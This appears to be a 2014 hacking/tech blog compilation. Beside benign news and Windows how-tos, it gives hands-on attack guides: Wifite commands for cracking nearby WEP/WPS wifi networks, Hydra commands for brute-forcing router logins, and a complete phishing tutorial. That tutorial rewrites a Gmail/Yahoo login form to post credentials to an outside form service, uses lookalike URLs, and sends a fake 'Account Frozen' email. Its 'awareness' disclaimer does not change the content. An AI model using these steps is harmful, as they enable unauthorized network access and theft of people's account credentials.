Monday 1 September 2014

WhatsApp with free voice calling on its way

According to news report, mobile messaging service WhatsApp may soon introduce free voice calling feature to its list of features. At the Mobile World Congress earlier this year, WhatsApp CEO Jan Koum announced its plans of adding voice services to its feature list during the second quarter. During the same time, it had revealed to bring voice to Android and iOS first, followed by some Nokia and BlackBerry phones. Now it looks like the feature is set to launch very soon.
In a recent revelation by WPCentral, some volunteers who translate the app’s Hindi version were apparently asked to translate new strings. The translation requests were for the words ‘Hang up’, ‘Incoming call’ and ‘Outgoing call’, clearly indicating the upcoming voice calling functionality.
“The leaked images of the upcoming user interface shows that the app has been enabled with other language translations which will be displayed at the time a person receives a call via WhatsApp,” a report on thefusejoplin.com stated.
WhatsApp is already one of the most popular smartphone messaging apps. The latest reports show that WhatsApp has crossed 600 million active users and crossed 50 million active users in India alone. The addition of free calling could boost its rank and broaden its user-base, while taking on existing free-calling apps such as Viber and Line.

Sunday 31 August 2014

Hacking Wifi

Wifite : Hacking Wifi The Easiest Way : Kali Linux Tutorial 

  • ecurities
  •  
  • Popular Posts
  •  
  • How to insta

Wifite

While the aircrack-ng suite is a well known name in the wireless hacking , the same can't be said about Wifite. Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not independent (eg. it hacks WPS using reaver), it does what it promises, and puts hacking on autopilot. I'm listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who can understand simple English instructions given by Wifite can use it on his own).

Features Of Wifite

  • Sorts targets by signal strength (in dB); cracks closest access points first
  • Automatically de-authenticates clients of hidden networks to reveal SSIDs
  • Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
  • Customizable settings (timeouts, packets/sec, etc)
  • "Anonymous" feature; changes MAC to a random address before attacking, then changes back whenattacks are complete
  • All captured WPA handshakes are backed up to wifite.py's current directory
  • Smart WPA de-authentication; cycles between all clients and broadcast deauths
  • Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
  • Displays session summary at exit; shows any cracked keys
  • All passwords saved to cracked.txt
  • Built-in updater./wifite.py -upgrade

I find it worth mentioning here, that not only does it hack wifi the easy way, it also hack in the best possible way.  For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP method to speed up data packets (I wrote a full length post about something which it does automatically!).

Hacking WEP network

If you've followed my previous posts on Hacking Wifi (WEP), you know there's a lot of homework you have to do before you even start hacking. But not here. With Wifite, its as easy and simple as a single command.
 wifite -wep
You might even have used the command
 wifite
If you see any error at this stage move to the bottom of the page for troubleshooting tips. If your issue is not listed please comment. We reply within a day.
The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by typing ctrl+c. It'll then ask you which wifi to hack. In my case, I didn't specify -wep so it shows all the wifis in range.
 You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 mins. Basically you can except it to hack the wifi in 10 mins approx. Notice how it automatically did the fake auth and ARP replay.
 Here are a few more screenshots of the working of Wifite, from their official website(./wifite.py is not something that should bother you. You can stick with the simple wifite. Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, using -frag) -

  Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait.
 Note, the limitation that many reader on my blog are beginners forbid me from introducing too many attacks. I made a tutorial about ARP replay attack, and that too was detailed as hell. However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be played with. A good idea would be to execute the following-
 wifite -help
This will tell you about the common usage commands, which will be very useful. Here is the list of WEP commands for different attacks-
    WEP
-wep         only target WEP networks [off]
-pps <num>   set the number of packets per second to inject [600]
-wept <sec>  sec to wait for each attack, 0 implies endless [600]
-chopchop    use chopchop attack      [on]
-arpreplay   use arpreplay attack     [on]
-fragment    use fragmentation attack [on]
-caffelatte  use caffe-latte attack   [on]
-p0841       use -p0841 attack        [on]
-hirte       use hirte (cfrag) attack [on]
-nofakeauth  stop attack if fake authentication fails    [off]
-wepca <n>   start cracking when number of ivs surpass n [10000]
-wepsave     save a copy of .cap files to this directory [off]
As you can see, its the same thing as is there on the help screenshot. Play around with the attacks and see what you can do. Hacking WPA without WPS wouldn't be that easy, and while I don't usually do this, I'm providing a link to an external website for the tutorial . This is the best WPA cracking tutorial I've seen, and I can't write a better one. It's highly detailed, and I'm just hoping I don't lose my audience to that website. Here is the tutorial - Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux

Troubleshooting

Wifite quits unexpectedly, sating "Scanning for wireless devices. No wireless interfaces were found. You need to plug in a wifi device or install drivers. Quitting."
You are using Kali inside a virtual machine most probably. Virtual machine does not support internal wireless card. Either buy an external wireless card, or do a live boot / side boot with Windows. Anything other than Virtual machine in general.

HACK FACEBOOK OR GMAIL ACCOUNT WITH SOCIAL ENGINEERING


HACK FACEBOOK OR GMAIL ACCOUNT WITH SOCIAL ENGINEERING TOOL KIT IN KALI LINUX
Social Engineering Toolkit
Humans are the weakest link in any security system ~Shashwat (That'll be me)
Social engineering toolkit does not exploit vulnerability in the mechanism of any service. It exploits the weakness in the human element of security.
The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.
READ :

Friday 29 August 2014

Share Remote Screen without any software

As we all knows Windows OS is full of hidden programs that are only limited to developer or geeks. Today we are going to learn about MSRA (windows remote assistance) executable. MSRA is windows inbuilt remote assistance program using which you can control remote pc’s, share remote screens, provide remote support and much more. Lets learn how to use MSRA for remote sharing.

Steps to Share or Control Remote PC using MSRA:

1. First of all click on startup and type command “MSRA” and press enter or run > msra

2. Now you will see screen like below having title “Windows Remote Assistance” , there are two options displayed:

Invite someone you trust to help you : Choose this option if you want to share your screen with someone.
Help someone who invited you : Choose this option if you want to control someone others PC remotely.

Click on Option a “Invite someone you trust to help you”

Now you can see three different options :

Send this invitation as file : On clicking this option you can save the invitation file and send it to anyone from which you require help. After saving the file another window will open containing the password. You have to provide that password to person whom you want to connect to your machine.
Use email to send an invitation: You can send invitation directly via email but it requires email client on your machine to send email like outlook etc.
Use Easy connect: Another method to directly connect two PC is using Easy connect but this require some basic settings at your routers end i.e. If the computer has IPv6 disabled or is behind a NAT router that blocks Teredo traffic, the Easy Connect option will be unavailable.

Now once you have send the remote assistance invitation file to user, he can connect to your PC by double clicking the invitation file and then entering the password.

Note: You need to enable remote assistance service.

3. Help someone who invited you : By clicking this option you can provide help to anyone who has done the above task. You will need two things : Invitation file and password to connect remote PC.

Woohooo… Did you know there is another smart option by which you can directly connect to any PC using IP address? If not, well lets learn that too. Yup we can also provide windows remote assistance support using IP address too. Here are options.

1. First of all click on startup and type command “MSRA” and press enter.
2. Now you will see screen where two options are displayed, Select “Help someone who invited you”.
3. After that you will see some option, click on the bottom one “Advanced connection option for help desk”

After clicking option you see below panel to enter IP address:

After entering IP address press Next to connect to IP address.

Know your Android

Android is a mobile operating system (OS) based on the Linux kernel and currently developed by Google. With a user interface based on direct manipulation, Android is designed primarily for touchscreen mobile devices such as smartphones and tablet computers, with specialized user interfaces for televisions (Android TV), cars (Android Auto), and wrist watches (Android Wear). The OS uses touch inputs that loosely correspond to real-world actions, like swiping, tapping, pinching, and reverse pinching to manipulate on-screen objects, and a virtual keyboard. Despite being primarily designed for touchscreen input, it also has been used in game consoles, digital cameras, and other electronics.

Alpha (1.0)
Beta (1.1)
Cupcake (1.5)
Donut (1.6)
Eclair (2.0–2.1)
Froyo (2.2–2.2.3)

Gingerbread (2.3–2.3.7)
Honeycomb (3.0–3.2.6)
Ice Cream Sandwich (4.0–4.0.4)
Jelly Bean (4.1–4.3.1)
KitKat (4.4–4.4.4)

As of 2011, Android has the largest installed base of any mobile OS and as of 2013, its devices also sell more than Windows, iOS, and Mac OS devices combined

As of July 2013 the Google Play store has had over 1 million Android apps published, and over 50 billion apps downloaded.

A developer survey conducted in April–May 2013 found that 71% of mobile developers develop for Android.

At Google I/O 2014, the company revealed that there were over 1 billion active monthly Android users (that have been active for 30 days), up from 538 million in June 2013.

Android's source code is released by Google under open source licenses, although most Android devices ultimately ship with a combination of open source and proprietary software

cookie

Magic cookie
A magic cookie, or just cookie for short, is a token or short packet of data passed between communicating programs, where the data is typically not meaningful to the recipient program. The contents are opaque and not usually interpreted until the recipient passes the cookie data back to the sender or perhaps another program at a later time. The cookie is often used like a ticket – to identify a particular event or transaction
HTTP cookie
A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is a small piece of data sent from a website and stored in a user's web browser while the user is browsing that website. Every time the user loads the website, the browser sends the cookie back to the server to notify the website of the user's previous activity
Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items in a shopping cart) or to record the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited by the user as far back as months or years ago).

Monday 25 August 2014

How to Spoof Mac Address:


The MAC address (Media Access Control address or addresses of media access control) is basically a unique hexadecimal identifier that possess most of the equipment associated with networks.
An Ethernet MAC address is a six byte number, usually expressed as a twelve digit hexadecimal number (Example: 1AB4C234AB1F).ddress (Media Access Control address or addresses of media access control) is basically a unique hexadecimal identifier that possess most of the equipment associate
Changing Your MAC Address Or Mac Address spoofing :-
Step 1.
The MAC Address in principle were designed so they can not be changed. However, there are many reasons (legal or not) to justify the fact that you want to change your MAC Address. One of these reasons, and perhaps the main one, is that ISPs, Cable Modem, more precisely, record and monitor your users by MAC Address, which often create certain disadvantages (e.g to share the Internet connection with other PCs).
Step 2.
There are several ways to modify and / or clone the MAC Address on Windows, including complex changes in the registry (regedit.exe), but the easiest one I found was to use a small application called EtherChange (runs on Windows 2000/XP/2003 / Vista).EtherChange After downloading, run the program and proceed to change or modify the MAC Address, If you are not able to run the program directly then another way to copy the program (etherchange) to drive in which operating system is installed.
Example:- I copied Etherchange to C drive as window is installed in C, Now location of the etherchange is C:\etherchange ,Now go to Start-->Run-->cmd, Then in cmd(Command Prompt) go to path as C:\etherchange and enter ,then follow step 3
Step 3.
Select the appropriate network adapter (network card).
type 1 to specify a new ethernet address, or MAC Address.
Enter new MAC Address without commas, dashes or any other separators.
Clever! Now just restart your computer to enable the new MAC Address.

hidden Files from Virus infected USB Pendrive

If you have some that hide all your file in the drive? ie; hides your files and folders, creates exe file extensions of your folders and even corrupt your files. You can view these files by going to
Tools>>Folder Options ..But the attributes of these files often stay unchanged even if you uncheck hidden attribute on file/folder properties.
I'm Assume with G Drive
So Go to Start -> Run-> Type CMD and Enter
type G:
Then type
attrib -s -h /s /d *.*
Wait for While And open Drive
Check Whether ur Data is there or not
For your Reference
+ Sets an attribute.
- Clears an attribute.
R Read-only file attribute.
A Archive file attribute.
S System file attribute.
H Hidden file attribute.
I Not content indexed file attribute.
[drive:][path][filename]
Specifies a file or files for attrib to process.
/S Processes matching files in the current folder
and all subfolders.
/D Processes folders as well.
/L Work on the attributes of the Symbolic Link versus
the target of the Symbolic Link

MICROSOFT WILL ANNOUNCE WINDOWS 9 "THRESHOLD" PREVIEW IN LATE-SEPTEMBER.


Microsoft appears to be done with Windows 8, after an unsuccessful start and low growth rate in the past two years, they are looking towards Windows 9, “Threshold” to come and save the day.

Windows 8 has around 5 percent share in the market, Windows 8.1, the small update in 2013, has just over 6 percent. Compared to Windows 7 and even XP, this is a very small slice of the PC pie, hurting Microsoft’s revenues.

Windows Threshold is the internal name for the next update to the PC OS. The technical preview will be coming late in September, according to multiple sources with insider information, this will be the first look at the changes.

Microsoft will be removing the Charms menu, the rather annoying right-side menu for settings and search, the Search Menu will return with a new Metro look and Microsoft will be bringing Metro apps onto the desktop mode, meaning we will still have both modes in Threshold.

This is what is expected at least, Microsoft gave no date for the Start Menu launch at BUILD in June and the removal of the Charms menu is only from internal sources, it has not been confirmed by anyone in Microsoft publicly.

The technical preview should give Microsoft enough time to redefine Windows 9 and make it a more consumer and PC friendly operating system. It is obvious that the move to half-touch was a mistake, with tablet sales for Windows 8 still in the dark compared to iPad/Android.

There are rumors this will be the first “free” update to Windows, following Apple’s recent change to free PC updates. Microsoft is the only company to still make users pay to upgrade, which might be one of the main reasons why users are still on Windows XP and 7.

This change would chunk revenues, but the growth in the PC market stopped a few years ago. Microsoft should look to bring as many new people into the Windows 9 program as possible, and look to make revenue through services and apps sales.

CRACKING YOUR ROUTER PASSWORD USING BACKTRACK 5 AND HYDRA! BY SABEER H4ckz

In this post I would like to show you how to crack your router password using Backtrack and Hydra in case you've forgotten it (Or not) You'll need it to port forward your router if you want to use RATs. I will cover wordlist cracking and brute force attack.

► THINGS NEEDED:
→ Computer
→ Rounter Lan IP
→ Backtrack5 (Optional), You can boot it from live CD, USB or run it in VMware player or in Virtual Box which I prefer.
→ THC Hydra logon cracker,great tool for cracking passwords (for example you can hack Gmail account and more), preinstalled in Backtracl5. GET IT HERE:http://www.thc.org/thc-hydra/
→ Word list (Just google it, I have been using POLISH wordlist from here:http://bezpieka.org/polski-slownik-premi... -wordlist) or if you have got time, enough patience and a lot of computing power you can brute force this baby.
→ Login list (optional), If you don't know your login you have to use login list. Again you will find it using google, or you can create yours, Usually, the login to the router control panel is: ADMIN.

►LETS BEGIN:
1. Start Backtrack5 and open terminal (you can press Ctrl + Alt + T)

2. Now type: "hydra -h" and familiarize with options and read instructions how to use HYDRA

3. OK, let the fun begin, in your terminal type: "hydra -l admin" (if the login is NOT ADMIN, you have to type -L (large l) and then specify the path to the login list you want to use, like in this example "hydra -L /root/Dekstop/loginlist.txt") then: "-P /PATH_TO_PW_LIST"
in my case it will look like: "hydra -l admin -P /root/Dekstop/pw.txt"
If you want to Brute Force it without using a dictionary you will have to use different command. Instead of "-P/PATH_TO_PW_LIST" use "-x"min:max"charset
MIN in minimum number of characters in password
MAX is maximum numbers of chars in pw
CHARSET is when you specify the characters used in pw generation: Use:
a - for lowercare letters
A - for uppercase letters
1 - for numbers
and for special characters just type them in
example: "hydra -l admin -x:5:8:aA1" (password from 5 to 8 chars using lowercase and uppercase letters and numbers)

4. Now we will choose options we want to use.
Use "-V" to show each attemp
Use "-F" to exit when password is found
You can use additional options if you want

5.Now type in your router IP, mine is 192.168.0.1. If you dont know your router IP, you will have to type: "dhclienteth0" and look under DHCPACK. Your router local IP will be shown there.
Type IP in your browser to check if correct, login windows should appear

6.Finally type in protocol we will be using, It will be: "http-get /" You can see complete command at the pictures below. Hit enter. The cracking will begin
When It is finished you will get your password listed in terminal..

Saturday 23 August 2014

hack a Gmail ID

Hello Friends how are you I hope you are all in good condition .
Today i am going to share with you something interesting trick about Cracking Email ID and Password,
Here I provide you the procedure you need to follow to hack a Gmail ID.

1.At first you need to open the website of the email id hoster (say Gmail,yahoo mail, Hotmail etc. For example. If the email ID is username@gmail.com you need to open www.gmail.com)

2.After opening the hoster website click inside the website once and press 'CTRL+U', you will be provided with a popup window from your browser in which the source code of the gmail website exists.

3.Copy the source code from the pop u window.(you can use 'CTRL+A" to select the code and 'CTRL+C' to copy it).

4.Open Notepad and paste the source code you copied from the popup window.

5.Save it as name.html.

6.Now in the file you saved find a code line starting from <form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form"> (this is the code which is related to yahoo,for other sites find code starting with and having string as (form method="post" action="xxxxxxxxxxxxx"))

7.Replace the (form method="post" action="xxxxxxxxxxxxx") code by the the following code after placing your form id: <form name="New_Form" action="http://www.webformdesigner.net/wfd_f2.php?id=Your Form ID Here" method="post" enctype="application/x-www-form-urlencoded" onsubmit="return New_Form_CF();">

Now save the name.html file again.

This finishes your preparation. Now follow this

If you want to hack a victim's user-name and password,the Victim has to login to his/her account through the page embedded with the code you saved.(I will explain the trick on how to make someone login from your page in the last paragraph of this article)

To create a web page, to make them login from your page You need to upload your saved goharshdotcom.html to a free hosting website (you can read our 'Guidelines to create a website for free' article to know how to create a website for free and the list of guinine free website hosters).

Now select your site name as yourmail.yahooo.com/support oremail.yahoo.com/support or some other format from which the victim can be convinced to visit for login.

You can add lots of unrelated letters in the URL(for examplemail.yahoo.com/support/EhnTuhdEWsh_SECURELOGIN or you can even impress the victim if he/she do not have much knowledge about internet by a simple url like www.GmailloginSECURELOGIN.webs.com -which you can obtain for free) as mail.yahoo.com/support URL will no longer available for registering.You can also add some rubbish numbers and make is very long so that the victim wont see the name of webhost in the link you provide.

Create a fake mail like support_yahoo@yahoo.com (like Support.googleforyou@gmail.com etc if victim's id is of gmail) and send a mail to the victim to his email id stating "Account Frozen" and in the mail write "Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen".

After reading this the victim clicks on the link and enter his ID and password. but as soon as this happens, as you have given the redirecting URL as the URL of the site itself it will go to the login page again after he click submit.The victim will think that he might have entered a wrong password so that the page reloaded again(As it usually happens while we login through any other website)but in reallity the username and password will been sent to your email account you specified and the victim will still not knowing that his account has been hacked.

Warning :

"This Hacking trick is just to make you aware of Phishing. And it is just a small contribution from us to make our Readers aware of these things. Please do not use this trick to get someone's personal data,Which is illegal. Using this just to fool your friends is left to you and your friend but if you get caught We do not bear any responsibility.If you find anybody adopting this trick to steal your data, Contact me for the solution."

Thank you,

Friday 22 August 2014

Li-Fi & Wifi


WiFi = wireless fidelity, Li-Fi = light fidelity.
Wi-Fi, also spelled Wifi or WiFi, is a local area wireless technology that allows an electronic device to exchange data or connect to the internet using 2.4 GHz UHF and 5 GHz SHF radio waves. The name is a trademark name, and is a play on the audiophile term Hi-Fi. The Wi-Fi Alliance defines Wi-Fi as any "wireless local area network (WLAN) products that are based on the Institute of Electrical and Electronics Engineers' (IEEE) 802.11 standards". However, since most modern WLANs are based on these standards, the term "Wi-Fi" is used in general English as a synonym for "WLAN". Only Wi-Fi products that complete Wi-Fi Alliance interoperability certification testing successfully may use the "Wi-Fi CERTIFIED" trademark.
Many devices can use Wi-Fi, e.g., personal computers, video-game consoles, smartphones, some digital cameras, tablet computers and digital audio players. These can connect to a network resource such as the Internet via a wireless network access point. Such an access point (or hotspot) has a range of about 20 meters (66 feet) indoors and a greater range outdoors. Hotspot coverage can comprise an area as small as a single room with walls that block radio waves, or as large as many square kilometres achieved by using multiple overlapping access points.
Depiction of a device sending information wirelessly to another device, both connected to the local network, in order to print a document.Wi-Fi can be less secure than wired connections (such as Ethernet) because an intruder does not need a physical connection. Web pages that use SSL are secure but unencrypted internet access can easily be detected by intruders. Because of this, Wi-Fi has adopted various encryption technologies. The early encryption WEP, proved easy to break. Higher quality protocols (WPA, WPA2) were added later. An optional feature added in 2007, called Wi-Fi Protected Setup (WPS), had a serious flaw that allowed an attacker to recover the router's password.The Wi-Fi Alliance has since updated its test plan and certification program to ensure all newly certified devices resist attacks.
What Is Li fi
Li-Fi, as coined by Prof. Harald Haas during his TED Global talk, is bidirectional, high speed and fully networked wireless communications, like Wi-Fi, using visible light. Li-Fi is a subset of visible light communications (VLC) and can be a complement to RF communication (Wi-Fi or Cellular network), or a replacement in contexts of data broadcasting.
It is wireless and uses visible light communication (instead of radio frequency waves), that is part of the Optical Wireless Communications technologies, which carries much more information, and has been proposed as a solution to the RF-bandwidth limitations. A complete solution includes an industry led standardization process.

Change Your Ip In Less Then 1 Minute

   
                     In my previous post i had show you how to Grab someone ip address now i will show you how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.


  • Click on "Start" in the bottom left corner of the screen.
  • Click on "RUN"
  • Type in "command" and click OK

      You should be now at MSDOS prompt Screen

  • Type "ipconfig /release" just like that, and press "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"

     Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

  •  Right click on "Local Area Connection" and click "properties"
  • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  • Click on "Use the following IP address" under the "General" tab
  • Create an IP address (It doesn't matter what it is)
  • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  • Press the "Ok" button here
  • Hit the "Ok" button again

     Now you should be back to the "Local Area Connection" screen.

  • Right-click back on "Local Area Connection" and go to properties again.
  • Go back to the "TCP/IP" settings
  • This time, select "Obtain an IP address automatically"
  • Click on "Ok"
  • Hit "Ok" again.
  • Now you have a New IP address.

8 Awesome Tips For Freelance Programmers

A freelance programmer can enjoy a nice career. Not only that, he or she can avoid working at a large corporation where they will have to deal with company politics and an eventual ceiling. Of course, it is not all fun and games as a well-trained and hardworkingprogrammer should follow some basic tips if he or she wants to enjoy success in this arena. With that in mind, here are eight tips for freelance programmers.

1. Constant communication:

When taking on a project, one should communicate with the business as often as possible. This means, when speaking to the client, one should mention any road blocks or any accomplishments. With an open door policy, the programmer will have an easier time keeping clients happy and informed.

2. Educating:

While most software developers possess a lot of skills and brains, it is wise to attend more computer classes. By continuing the education, a hardworking programmer can learn more and avoid getting left behind by the competition. In fact, this is extremely important as this field is ever-evolving and new coding ideas and techniques come up all the time.

3. Do not sell yourself short:

All-too-often, an independent contractor or business owner will ask for a low wage. When doing this, one will hurt their long-term chances for success. While it is not wise to ask for top dollar, it is beneficial to demand a livable wage. Believe it or not, when dealing with a confident programmer, a company is likely to give in to the financial demands.

4. Home office:

Whether a person works from home or at the office all the time, they should still have ahome office. With this, a programmer can complete tasks without interruption from spouses, children or animals. Without a doubt, this is extremely important as a serious programmer will need to concentrate on the task at hand.

5. Have website and online presence: 

Now, more than ever, a company owner or contractor should have a website and online presence. With this, a reliable software developer can reach millions of potential clients. At the same time, while making a website, one should keep it simple, straightforward and easy to understand. With this, a programmer can showcase his or her talent for the world to see.

6. Outsource quality assurance: 

It is not easy for a programmer to check out his or her programs and code. To avoid turning in a bad product, a smart developer should hire a contractor who can check out the code. By taking a few hours to go over everything, a quality assurance analyst can find any issues and report back to the programmer. This is a great idea as one mistake can result in serious problems in the short and long run.

7. Speak up:

Often, a foolish client will want an unrealistic or impractical solution. While the customer is always right, it is still beneficial if a programmer voices his or her concerns. This should not cause a lot of problems as most business owners will willingly give in as they will, usually, trust the programmer. Either way, it is wise to remain assertive when talking about the product.

8. Set schedule:

It is often tempting for a business owner to set a weird schedule or work nights and weekends. While this is okay at first, a serious programmer who wants to succeed should opt to work a typical 9-5 schedule. This allows other business owners to stay in contact and communicate with the programmer. Since most other entrepreneurs love to work 9 to 5, this is a great way to go above and beyond and offer solid customer support.

It is not easy to work as an independent software programmer. With that in mind, with a few basic tips, a developer can take his or her ideas to the next level. Remember, when focused and ready, a programmer will please his or her clients and make a nice living in the process.

Popular Posts